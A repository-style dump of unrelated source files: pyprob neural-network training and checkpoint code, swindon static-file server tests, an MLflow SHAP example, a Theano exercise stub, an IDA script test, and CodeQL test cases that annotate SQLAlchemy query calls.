embedding = torch.cat(embedding, dim=1)
self._infer_observe_embedding = self._layers_observe_embedding_final(embedding)
def _init_layers(self):
raise NotImplementedError()
def _polymorph(self, batch):
raise NotImplementedError()
def _infer_step(self, variable, previous_variable=None, proposal_min_train_iterations=None):
raise NotImplementedError()
def _loss(self, batch):
raise NotImplementedError()
def _save(self, file_name):
self._modified = util.get_time_str()
self._updates += 1
data = {}
data['pyprob_version'] = __version__
data['torch_version'] = torch.__version__
# The following is due to a temporary hack related with https://github.com/pytorch/pytorch/issues/9981 and can be deprecated by using dill as pickler with torch > 0.4.1
data['inference_network'] = copy.copy(self)
data['inference_network']._model = None
data['inference_network']._optimizer = None
if self._optimizer is None:
data['inference_network']._optimizer_state = None
else:
data['inference_network']._optimizer_state = self._optimizer.state_dict()
data['inference_network']._learning_rate_scheduler = None
if self._learning_rate_scheduler is None:
data['inference_network']._learning_rate_scheduler_state = None
else:
data['inference_network']._learning_rate_scheduler_state = self._learning_rate_scheduler.state_dict()
def thread_save():
tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
tmp_file_name = os.path.join(tmp_dir, 'pyprob_inference_network')
torch.save(data, tmp_file_name)
tar = tarfile.open(file_name, 'w:gz', compresslevel=2)
tar.add(tmp_file_name, arcname='pyprob_inference_network')
tar.close()
shutil.rmtree(tmp_dir)
t = Thread(target=thread_save)
t.start()
t.join()
@staticmethod
def _load(file_name):
try:
tar = tarfile.open(file_name, 'r:gz')
tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
tmp_file = os.path.join(tmp_dir, 'pyprob_inference_network')
tar.extract('pyprob_inference_network', tmp_dir)
tar.close()
if util._cuda_enabled:
data = torch.load(tmp_file)
else:
data = torch.load(tmp_file, map_location=lambda storage, loc: storage)
shutil.rmtree(tmp_dir)
except Exception as e:
print(e)
raise RuntimeError('Cannot load inference network.')
if data['pyprob_version'] != __version__:
print(colored('Warning: different pyprob versions (loaded network: {}, current system: {})'.format(data['pyprob_version'], __version__), 'red', attrs=['bold']))
if data['torch_version'] != torch.__version__:
print(colored('Warning: different PyTorch versions (loaded network: {}, current system: {})'.format(data['torch_version'], torch.__version__), 'red', attrs=['bold']))
ret = data['inference_network']
if util._cuda_enabled:
if ret._on_cuda:
if ret._device != util._device:
print(colored('Warning: loading CUDA (device {}) network to CUDA (device {})'.format(ret._device, util._device), 'red', attrs=['bold']))
else:
print(colored('Warning: loading CPU network to CUDA (device {})'.format(util._device), 'red', attrs=['bold']))
else:
if ret._on_cuda:
print(colored('Warning: loading CUDA (device {}) network to CPU'.format(ret._device), 'red', attrs=['bold']))
ret.to(device=util._device)
# For compatibility loading NNs saved before 0.13.2.dev2
if not hasattr(ret, '_distributed_train_loss'):
ret._distributed_train_loss = util.to_tensor(0.)
if not hasattr(ret, '_distributed_valid_loss'):
ret._distributed_valid_loss = util.to_tensor(0.)
if not hasattr(ret, '_distributed_history_train_loss'):
ret._distributed_history_train_loss = []
if not hasattr(ret, '_distributed_history_train_loss_trace'):
ret._distributed_history_train_loss_trace = []
if not hasattr(ret, '_distributed_history_valid_loss'):
ret._distributed_history_valid_loss = []
if not hasattr(ret, '_distributed_history_valid_loss_trace'):
ret._distributed_history_valid_loss_trace = []
if not hasattr(ret, '_optimizer_state'):
ret._optimizer_state = None
if not hasattr(ret, '_learning_rate_scheduler_state'):
ret._learning_rate_scheduler_state = None
# For compatibility loading NNs saved before 0.13.2.dev5
if not hasattr(ret, '_total_train_traces_end'):
ret._total_train_traces_end = None
# For compatibility loading NNs saved before 0.13.2.dev6
if not hasattr(ret, '_loss_init'):
ret._loss_init = None
if not hasattr(ret, '_learning_rate_init'):
ret._learning_rate_init = 0
if not hasattr(ret, '_learning_rate_end'):
ret._learning_rate_end = 0
if not hasattr(ret, '_weight_decay'):
ret._weight_decay = 0
if not hasattr(ret, '_learning_rate_scheduler_type'):
ret._learning_rate_scheduler_type = None
ret._create_optimizer(ret._optimizer_state)
ret._create_lr_scheduler(ret._learning_rate_scheduler_state)
return ret
def to(self, device=None, *args, **kwargs):
self._device = device
self._on_cuda = 'cuda' in str(device)
super().to(device=device, *args, *kwargs)
def _pre_generate_layers(self, dataset, batch_size=64, save_file_name_prefix=None):
if not self._layers_initialized:
self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
self._init_layers()
self._layers_initialized = True
self._layers_pre_generated = True
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=0, collate_fn=lambda x: Batch(x))
util.progress_bar_init('Layer pre-generation...', len(dataset), 'Traces')
i = 0
for i_batch, batch in enumerate(dataloader):
i += len(batch)
layers_changed = self._polymorph(batch)
util.progress_bar_update(i)
if layers_changed and (save_file_name_prefix is not None):
file_name = '{}_00000000_pre_generated.network'.format(save_file_name_prefix)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
util.progress_bar_end('Layer pre-generation complete')
def _distributed_sync_parameters(self):
""" broadcast rank 0 parameter to all ranks """
# print('Distributed training synchronizing parameters across nodes...')
for param in self.parameters():
dist.broadcast(param.data, 0)
def _distributed_sync_grad(self, world_size):
""" all_reduce grads from all ranks """
# print('Distributed training synchronizing gradients across nodes...')
# make a local map of all non-zero gradients
ttmap = util.to_tensor([1 if p.grad is not None else 0 for p in self.parameters()])
# get the global map of all non-zero gradients
pytorch_allreduce_supports_list = True
try:
dist.all_reduce([ttmap])
except:
pytorch_allreduce_supports_list = False
dist.all_reduce(ttmap)
gl = []
for i, param in enumerate(self.parameters()):
if param.grad is not None:
gl.append(param.grad.data)
elif ttmap[i]:
# someone else had a non-zero grad so make a local zero'd copy
param.grad = util.to_tensor(torch.zeros_like(param.data))
gl.append(param.grad.data)
# reduce all gradients used by at least one rank
if pytorch_allreduce_supports_list:
dist.all_reduce(gl)
else:
for g in gl:
dist.all_reduce(g)
# average them
for li in gl:
li /= float(world_size)
def _distributed_update_train_loss(self, loss, world_size):
self._distributed_train_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_train_loss)
self._distributed_train_loss /= float(world_size)
self._distributed_history_train_loss.append(float(self._distributed_train_loss))
self._distributed_history_train_loss_trace.append(self._total_train_traces)
return self._distributed_train_loss
def _distributed_update_valid_loss(self, loss, world_size):
self._distributed_valid_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_valid_loss)
self._distributed_valid_loss /= float(world_size)
self._distributed_history_valid_loss.append(float(self._distributed_valid_loss))
self._distributed_history_valid_loss_trace.append(self._total_train_traces)
return self._distributed_valid_loss
def _create_optimizer(self, state_dict=None):
if self._optimizer_type is None: # happens when loading pre-generated network
return
# print('Creating new optimizer')
if self._optimizer_type in [Optimizer.ADAM, Optimizer.ADAM_LARC]:
self._optimizer = optim.Adam(self.parameters(), lr=self._learning_rate_init, weight_decay=self._weight_decay)
else: # optimizer_type in [Optimizer.SGD, Optimizer.SGD_LARC]
self._optimizer = optim.SGD(self.parameters(), lr=self._learning_rate_init, momentum=self._momentum, nesterov=True, weight_decay=self._weight_decay)
if self._optimizer_type in [Optimizer.ADAM_LARC, Optimizer.SGD_LARC]:
self._optimizer = LARC(self._optimizer)
if state_dict is not None:
# print('Setting optimizer state')
self._optimizer.load_state_dict(state_dict)
def _create_lr_scheduler(self, state_dict=None):
if self._learning_rate_scheduler_type is None: # happens when loading pre-generated network
return
# print('Creating new learning rate scheduler')
learning_rate_scheduler_type = self._learning_rate_scheduler_type
iter_end = self._total_train_traces_end
lr_init = self._learning_rate_init
lr_end = self._learning_rate_end
def _poly_decay(iter, power):
return (lr_init - lr_end) * ((1 - iter/iter_end) ** power) + lr_end
if self._optimizer is None:
self._learning_rate_scheduler = None
elif learning_rate_scheduler_type == LearningRateScheduler.POLY1:
self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=1.) / lr_init)
elif learning_rate_scheduler_type == LearningRateScheduler.POLY2:
self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=2.) / lr_init)
else:
self._learning_rate_scheduler = None
if self._learning_rate_scheduler is not None and state_dict is not None:
# print('Setting learning rate scheduler state')
self._learning_rate_scheduler.load_state_dict(state_dict)
def optimize(self, num_traces, dataset, dataset_valid=None, num_traces_end=1e9, batch_size=64, valid_every=None, optimizer_type=Optimizer.ADAM, learning_rate_init=0.0001, learning_rate_end=1e-6, learning_rate_scheduler_type=LearningRateScheduler.NONE, momentum=0.9, weight_decay=1e-5, save_file_name_prefix=None, save_every_sec=600, distributed_backend=None, distributed_params_sync_every_iter=10000, distributed_num_buckets=10, dataloader_offline_num_workers=0, stop_with_bad_loss=False, log_file_name=None):
if not self._layers_initialized:
self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
self._init_layers()
self._layers_initialized = True
if distributed_backend is None:
distributed_world_size = 1
distributed_rank = 0
else:
dist.init_process_group(backend=distributed_backend)
distributed_world_size = dist.get_world_size()
distributed_rank = dist.get_rank()
self._distributed_backend = distributed_backend
self._distributed_world_size = distributed_world_size
# Training data loader
if isinstance(dataset, OfflineDataset):
if distributed_world_size == 1:
dataloader = DataLoader(dataset, batch_sampler=TraceBatchSampler(dataset, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader = DataLoader(dataset, batch_sampler=DistributedTraceBatchSampler(dataset, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=0, collate_fn=lambda x: Batch(x))
# Validation data loader
if dataset_valid is not None:
if distributed_world_size == 1:
dataloader_valid = DataLoader(dataset_valid, batch_sampler=TraceBatchSampler(dataset_valid, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader_valid = DataLoader(dataset_valid, batch_sampler=DistributedTraceBatchSampler(dataset_valid, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
if not self._layers_pre_generated:
for i_batch, batch in enumerate(dataloader_valid):
self._polymorph(batch)
if distributed_world_size > 1:
util.init_distributed_print(distributed_rank, distributed_world_size, False)
if distributed_rank == 0:
print(colored('Distributed synchronous training', 'yellow', attrs=['bold']))
print(colored('Distributed backend : {}'.format(distributed_backend), 'yellow', attrs=['bold']))
print(colored('Distributed world size : {}'.format(distributed_world_size), 'yellow', attrs=['bold']))
print(colored('Distributed minibatch size : {} (global effective), {} (per rank)'.format(batch_size * distributed_world_size, batch_size), 'yellow', attrs=['bold']))
print(colored('Distributed init.learn rate: {} (global), {} (base)'.format(learning_rate_init * math.sqrt(distributed_world_size), learning_rate_init), 'yellow', attrs=['bold']))
print(colored('Distributed optimizer : {}'.format(str(optimizer_type)), 'yellow', attrs=['bold']))
print(colored('Distributed dataset size : {:,}'.format(len(dataset)), 'yellow', attrs=['bold']))
print(colored('Distributed num. buckets : {:,}'.format(len(dataloader.batch_sampler._buckets)), 'yellow', attrs=['bold']))
# bucket_size = math.ceil((len(dataset) / batch_size) / distributed_num_buckets)
# print(colored('Distributed bucket size : {:,} minibatches ({:,} traces)'.format(bucket_size, bucket_size * batch_size), 'yellow', attrs=['bold']))
self.train()
prev_total_train_seconds = self._total_train_seconds
time_start = time.time()
time_loss_min = time_start
time_last_batch = time_start
if valid_every is None:
valid_every = max(100, num_traces / 1000)
last_validation_trace = -valid_every + 1
valid_loss = 0
if self._optimizer_type is None:
self._optimizer_type = optimizer_type
if self._momentum is None:
self._momentum = momentum
if self._weight_decay is None:
self._weight_decay = weight_decay
if self._learning_rate_scheduler_type is None:
self._learning_rate_scheduler_type = learning_rate_scheduler_type
if self._learning_rate_init is None:
self._learning_rate_init = learning_rate_init * math.sqrt(distributed_world_size)
if self._learning_rate_end is None:
self._learning_rate_end = learning_rate_end
if self._total_train_traces_end is None:
self._total_train_traces_end = num_traces_end
epoch = 0
trace = 0
stop = False
print('Train. time | Epoch| Trace | Init. loss| Min. loss | Curr. loss| T.since min | Learn.rate| Traces/sec')
max_print_line_len = 0
loss_min_str = ''
time_since_loss_min_str = ''
loss_init_str = '' if self._loss_init is None else '{:+.2e}'.format(self._loss_init)
if save_every_sec is not None:
last_auto_save_time = time_start - save_every_sec
last_print = time_start - util._print_refresh_rate
if (distributed_rank == 0) and log_file_name is not None:
log_file = open(log_file_name, mode='w', buffering=1)
log_file.write('time, iteration, trace, loss, valid_loss, learning_rate, mean_trace_length_controlled, sub_mini_batches, distributed_bucket_id, traces_per_second\n')
while not stop:
epoch += 1
for i_batch, batch in enumerate(dataloader):
time_batch = time.time()
# Important, a self._distributed_sync_parameters() needs to happen at the very beginning of a training
if (distributed_world_size > 1) and (self._total_train_iterations % distributed_params_sync_every_iter == 0):
self._distributed_sync_parameters()
if self._layers_pre_generated: # and (distributed_world_size > 1):
layers_changed = False
else:
layers_changed = self._polymorph(batch)
if (self._optimizer is None) or layers_changed:
self._create_optimizer()
self._create_lr_scheduler()
# print(self._optimizer.state[self._optimizer.param_groups[0]['params'][0]])
self._optimizer.zero_grad()
success, loss = self._loss(batch)
if not success:
print(colored('Cannot compute loss, skipping batch. Loss: {}'.format(loss), 'red', attrs=['bold']))
if stop_with_bad_loss:
return
else:
loss.backward()
if distributed_world_size > 1:
self._distributed_sync_grad(distributed_world_size)
self._optimizer.step()
loss = float(loss)
if (distributed_world_size > 1):
loss = self._distributed_update_train_loss(loss, distributed_world_size)
if self._loss_init is None:
self._loss_init = loss
self._loss_max = loss
loss_init_str = '{:+.2e}'.format(self._loss_init)
# loss_max_str = '{:+.3e}'.format(self._loss_max)
if loss < self._loss_min:
self._loss_min = loss
loss_str = colored('{:+.2e}'.format(loss), 'green', attrs=['bold'])
loss_min_str = colored('{:+.2e}'.format(self._loss_min), 'green', attrs=['bold'])
time_loss_min = time_batch
time_since_loss_min_str = colored(util.days_hours_mins_secs_str(0), 'green', attrs=['bold'])
elif loss > self._loss_max:
self._loss_max = loss
loss_str = colored('{:+.2e}'.format(loss), 'red', attrs=['bold'])
# loss_max_str = colored('{:+.3e}'.format(self._loss_max), 'red', attrs=['bold'])
else:
if loss < self._loss_previous:
loss_str = colored('{:+.2e}'.format(loss), 'green')
elif loss > self._loss_previous:
loss_str = colored('{:+.2e}'.format(loss), 'red')
else:
loss_str = '{:+.2e}'.format(loss)
loss_min_str = '{:+.2e}'.format(self._loss_min)
# loss_max_str = '{:+.3e}'.format(self._loss_max)
time_since_loss_min_str = util.days_hours_mins_secs_str(time_batch - time_loss_min)
self._loss_previous = loss
self._total_train_iterations += 1
trace += batch.size * distributed_world_size
self._total_train_traces += batch.size * distributed_world_size
self._total_train_seconds = prev_total_train_seconds + (time_batch - time_start)
self._history_train_loss.append(loss)
self._history_train_loss_trace.append(self._total_train_traces)
traces_per_second = batch.size * distributed_world_size / (time_batch - time_last_batch)
if dataset_valid is not None:
if trace - last_validation_trace > valid_every:
print('\nComputing validation loss')
valid_loss = 0
with torch.no_grad():
for i_batch, batch in enumerate(dataloader_valid):
_, v = self._loss(batch)
valid_loss += v
valid_loss = float(valid_loss) / (len(dataloader_valid) / distributed_world_size)
if distributed_world_size > 1:
valid_loss = self._distributed_update_valid_loss(valid_loss, distributed_world_size)
self._history_valid_loss.append(valid_loss)
self._history_valid_loss_trace.append(self._total_train_traces)
last_validation_trace = trace - 1
if (distributed_rank == 0) and (save_file_name_prefix is not None) and (save_every_sec is not None):
if time_batch - last_auto_save_time > save_every_sec:
last_auto_save_time = time_batch
file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
time_last_batch = time_batch
if trace >= num_traces:
print('\nStop condition reached. num_traces: {}'.format(num_traces))
stop = True
if self._total_train_traces >= self._total_train_traces_end:
print(colored('\nStop condition reached. num_traces_end set during network generation: {}'.format(self._total_train_traces_end), 'red', attrs=['bold']))
if self._learning_rate_scheduler is not None:
print(colored('Warning: continuing training with learning rate scheduler beyond num_traces_end, make sure this is intended'.format(self._total_train_traces_end), 'red', attrs=['bold']))
# stop = True
if self._learning_rate_scheduler is not None:
self._learning_rate_scheduler.step(self._total_train_traces) # Gives a DeprecationWarning with PyTorch 1.4.0
learning_rate_current = self._optimizer.param_groups[0]['lr']
learning_rate_current_str = '{:+.2e}'.format(learning_rate_current)
if (time_batch - last_print > util._print_refresh_rate) or stop:
last_print = time_batch
total_training_seconds_str = util.days_hours_mins_secs_str(self._total_train_seconds)
epoch_str = '{:4}'.format('{:,}'.format(epoch))
total_train_traces_str = '{:9}'.format('{:,}'.format(self._total_train_traces))
traces_per_second_str = '{:,.1f}'.format(traces_per_second)
print_line = '{} | {} | {} | {} | {} | {} | {} | {} | {} '.format(total_training_seconds_str, epoch_str, total_train_traces_str, loss_init_str, loss_min_str, loss_str, time_since_loss_min_str, learning_rate_current_str, traces_per_second_str)
max_print_line_len = max(len(print_line), max_print_line_len)
print(print_line.ljust(max_print_line_len), end='\r')
sys.stdout.flush()
if (distributed_rank == 0) and log_file_name is not None:
bucket_id = None
if isinstance(dataloader.batch_sampler, DistributedTraceBatchSampler):
bucket_id = dataloader.batch_sampler._current_bucket_id
log_file.write('{}, {}, {}, {}, {}, {}, {}, {}, {}, {}\n'.format(self._total_train_seconds, self._total_train_iterations, self._total_train_traces, loss, valid_loss, learning_rate_current, batch.mean_length_controlled, len(batch.sub_batches), bucket_id, traces_per_second))
if stop:
break
if (distributed_rank == 0) and log_file_name is not None:
log_file.close()
print()
if (distributed_rank == 0) and (save_file_name_prefix is not None):
file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
|
tests/single_file_test.py | tailhook/swindon | 104 | 11195641 | import os.path
def data_check(data, method, expected):
if method == "HEAD":
assert data == b''
else:
assert data == expected
async def test_ok(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
resp, data = await get_request(swindon.url / 'static-file')
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'single_file'
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/static_file.txt"'.format(TESTS_DIR)
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
async def test_query_args(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
url = swindon.url / 'static-file'
url = url.with_query(foo='bar')
resp, data = await get_request(url)
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'single_file'
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/static_file.txt"'.format(TESTS_DIR)
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
async def test_request_method(swindon, get_request, static_request_method):
resp, data = await get_request(swindon.url / 'static-file')
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
async def test_missing_file(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
msg = open(os.path.dirname(__file__) + '/404.html', 'rb').read()
resp, data = await get_request(swindon.url / 'missing-file')
assert resp.status == 404
data_check(data, static_request_method, msg)
assert resp.headers['Content-Type'] != 'text/is/missing'
assert resp.headers['Content-Length'] == str(len(msg))
if debug_routing:
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/missing_file.txt"'.format(TESTS_DIR)
async def test_permission(swindon, get_request, static_request_method):
msg = open(os.path.dirname(__file__) + '/403.html', 'rb').read()
resp, data = await get_request(swindon.url / 'no-permission')
assert resp.status == 403
data_check(data, static_request_method, msg)
assert resp.headers['Content-Type'] == 'text/html'
assert resp.headers['Content-Length'] == str(len(msg))
async def test_extra_headers(swindon, get_request, static_request_method):
resp, data = await get_request(swindon.url / 'static-file-headers')
assert resp.status == 200
assert resp.headers.getall('X-Extra-Header') == ['extra value']
assert 'X-Bad-Header' not in resp.headers
async def test_symlink(swindon, get_request, static_request_method,
debug_routing, TESTS_DIR):
resp, data = await get_request(swindon.url / 'symlink')
assert resp.status == 200
assert resp.headers['Content-Type'] == 'text/plain'
assert resp.headers['Content-Length'] == '17'
data_check(data, static_request_method, b'Static file test\n')
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'single_symlink'
assert resp.headers['X-Swindon-File-Path'] == \
'"{}/assets/link.txt"'.format(TESTS_DIR)
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
async def test_non_file(swindon, get_request, static_request_method,
debug_routing):
msg = open(os.path.dirname(__file__) + '/403.html', 'rb').read()
resp, data = await get_request(swindon.url / 'dev-null')
assert resp.status == 403
assert resp.headers['Content-Type'] == 'text/html'
assert resp.headers['Content-Length'] == str(len(msg))
data_check(data, static_request_method, msg)
if debug_routing:
assert resp.headers['X-Swindon-Route'] == 'dev_null'
assert resp.headers['X-Swindon-File-Path'] == \
'"/dev/null"'
else:
assert 'X-Swindon-Route' not in resp.headers
assert 'X-Swindon-File-Path' not in resp.headers
|
examples/shap/binary_classification.py | PeterSulcs/mlflow | 10,351 | 11195659 | <gh_stars>1000+
import os
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.ensemble import RandomForestClassifier
import shap
import mlflow
from utils import to_pandas_Xy
# prepare training data
X, y = to_pandas_Xy(load_breast_cancer())
X = X.iloc[:50, :8]
y = y.iloc[:50]
# train a model
model = RandomForestClassifier()
model.fit(X, y)
# log an explanation
with mlflow.start_run() as run:
mlflow.shap.log_explanation(lambda X: model.predict_proba(X)[:, 1], X)
# list artifacts
client = mlflow.tracking.MlflowClient()
artifact_path = "model_explanations_shap"
artifacts = [x.path for x in client.list_artifacts(run.info.run_id, artifact_path)]
print("# artifacts:")
print(artifacts)
# load back the logged explanation
dst_path = client.download_artifacts(run.info.run_id, artifact_path)
base_values = np.load(os.path.join(dst_path, "base_values.npy"))
shap_values = np.load(os.path.join(dst_path, "shap_values.npy"))
# show a force plot
shap.force_plot(float(base_values), shap_values[0, :], X.iloc[0, :], matplotlib=True)
|
01_basics/01_building_expressions/03_tensor.py | johny-c/theano_exercises | 711 | 11195686 | # Fill in the TODOs in this exercise, then run
# python 03_tensor.py to see if your solution works!
import numpy as np
from theano import function
raise NotImplementedError("TODO: add any other imports you need")
def make_tensor(dim):
"""
Returns a new Theano tensor with no broadcastable dimensions.
dim: the total number of dimensions of the tensor.
(You can use any dtype you like)
"""
raise NotImplementedError("TODO: implement this function.")
def broadcasted_add(a, b):
"""
a: a 3D theano tensor
b: a 4D theano tensor
Returns c, a 4D theano tensor, where
c[i, j, k, l] = a[l, k, i] + b[i, j, k, l]
for all i, j, k, l
"""
raise NotImplementedError("TODO: implement this function.")
def partial_max(a):
"""
a: a 4D theano tensor
Returns b, a theano matrix, where
b[i, j] = max_{k,l} a[i, k, l, j]
for all i, j
"""
raise NotImplementedError("TODO: implement this function.")
if __name__ == "__main__":
a = make_tensor(3)
b = make_tensor(4)
c = broadcasted_add(a, b)
d = partial_max(c)
f = function([a, b,], d)
rng = np.random.RandomState([1, 2, 3])
a_value = rng.randn(2, 2, 2).astype(a.dtype)
b_value = rng.rand(2, 2, 2, 2).astype(b.dtype)
c_value = np.transpose(a_value, (2, 1, 0))[:, None, :, :] + b_value
expected = c_value.max(axis=1).max(axis=1)
actual = f(a_value, b_value)
assert np.allclose(actual, expected), (actual, expected)
print "SUCCESS!"
|
test_scripts/dependency-test/t1.py | clayne/ida-qscripts | 131 | 11195693 | <reponame>clayne/ida-qscripts
import sys
subdir = os.path.join(os.path.dirname(__file__), 'subdir')
if subdir not in sys.path:
print("-->adding to path: %s" % subdir)
sys.path.append(subdir)
import datetime
import t2, t3, t4, t5
print("--- %s; this is %s.." % (datetime.datetime.now(), __file__))
t2.f2()
t3.f3()
t4.f4()
t5.f5() |
python/ql/test/library-tests/frameworks/sqlalchemy/new_tests.py | angie1148/codeql | 643 | 11195695 | import sqlalchemy
import sqlalchemy.orm
# SQLAlchemy is slowly migrating to a 2.0 version, and as part of 1.4 release have a 2.0
# style (forwards compatible) API that _can_ be adopted. So these tests are marked with
# either v1.4 or v2.0, such that we cover both.
raw_sql = "select 'FOO'"
text_sql = sqlalchemy.text(raw_sql) # $ constructedSql=raw_sql
Base = sqlalchemy.orm.declarative_base()
# ==============================================================================
# v1.4
# ==============================================================================
print("v1.4")
# Engine see https://docs.sqlalchemy.org/en/14/core/connections.html#sqlalchemy.engine.Engine
engine = sqlalchemy.create_engine("sqlite+pysqlite:///:memory:", echo=True)
result = engine.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = engine.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = engine.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
scalar_result = engine.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = engine.scalar(statement=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
# engine with custom execution options
# see https://docs.sqlalchemy.org/en/14/core/connections.html#sqlalchemy.engine.Engine.execution_options
engine_with_custom_exe_opts = engine.execution_options(foo=42)
result = engine_with_custom_exe_opts.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
even_more_opts = engine_with_custom_exe_opts.execution_options(bar=43)
result = even_more_opts.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# Connection see https://docs.sqlalchemy.org/en/14/core/connections.html#sqlalchemy.engine.Connection
conn = engine.connect()
conn: sqlalchemy.engine.base.Connection
result = conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# scalar
scalar_result = conn.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(object_=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(object_=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# exec_driver_sql
result = conn.exec_driver_sql(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# construction by object
conn = sqlalchemy.engine.base.Connection(engine)
result = conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# branched connection
branched_conn = conn.connect()
result = branched_conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# raw connection
raw_conn = conn.connection
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
cursor = raw_conn.cursor()
cursor.execute(raw_sql) # $ getSql=raw_sql
assert cursor.fetchall() == [("FOO",)]
cursor.close()
raw_conn = engine.raw_connection()
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# connection with custom execution options
conn_with_custom_exe_opts = conn.execution_options(bar=1337)
result = conn_with_custom_exe_opts.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# Session -- is what you use to work with the ORM layer
# see https://docs.sqlalchemy.org/en/14/orm/session_basics.html
# and https://docs.sqlalchemy.org/en/14/orm/session_api.html#sqlalchemy.orm.Session
session = sqlalchemy.orm.Session(engine)
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# scalar
scalar_result = session.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# other ways to construct a session
with sqlalchemy.orm.Session(engine) as session:
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
Session = sqlalchemy.orm.sessionmaker(engine)
session = Session()
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
with Session() as session:
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
with Session.begin() as session:
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# scoped_session
Session = sqlalchemy.orm.scoped_session(sqlalchemy.orm.sessionmaker(engine))
session = Session()
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# Querying (1.4)
# see https://docs.sqlalchemy.org/en/14/orm/session_basics.html#querying-1-x-style
# to do so we first need a model
class For14(Base):
__tablename__ = "for14"
